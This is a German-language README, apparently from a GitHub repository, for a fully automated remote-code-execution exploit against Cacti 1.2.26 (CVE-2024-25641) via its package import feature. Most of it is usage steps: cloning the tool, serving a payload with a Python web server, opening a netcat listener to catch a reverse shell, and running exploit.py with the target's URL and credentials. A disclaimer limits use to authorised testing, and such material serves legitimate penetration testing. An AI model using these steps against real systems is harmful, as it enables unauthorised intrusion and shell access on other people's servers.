
CVE-2024-25641 - Automatisierter RCE-Exploit - Cacti 1.2.26
Vollautomatischer Exploit für CVE-2024-25641. Wenn ein Benutzer authentifiziert ist, ist Cacti Version 1.2.26 anfällig für eine Schwachstelle zum willkürlichen Dateischreiben, die über die Funktion „Paketimport“ ausgenutzt werden kann, ermöglicht es authentifizierten Benutzern mit der Berechtigung „Vorlagen importieren“, beliebigen PHP-Code auf dem Webserver auszuführen (RCE).
Danksagung an diesen PoC : https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88 (Ich habe dies lediglich automatisiert, um einen ersten Zugang zu erhalten.)
Dieses Tool ist ausschließlich für Bildungs- und Testzwecke bestimmt. Der Autor dieses Tools ist nicht verantwortlich für Missbrauch oder illegale Aktivitäten, die damit durchgeführt werden. Verwenden Sie dieses Tool nur auf Systemen, die Sie besitzen oder für die Sie ausdrückliche Erlaubnis zum Testen haben. Unbefugter Zugriff auf Computersysteme ist illegal und unethisch.
# Clone the repository
git clone https://github.com/thisisveryfunny/CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26.git
cd CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26
# Setup Python web server
python -m http.server <PYTHON_WEB_SERVER_PORT>
# Setup netcat listener
nc -lvnp <LOCAL_PORT>
# Run the tool
pip install -r requirements.txt (if needed)
python exploit.py -L <LOCAL_IP> -lp <LOCAL_PORT> -wp <PYTHON_WEB_SERVER_PORT> -url <URL> -u <USER> -p <PASS>
Sie können sich auch Folgendes ansehen : CVE-2024-25641 PoC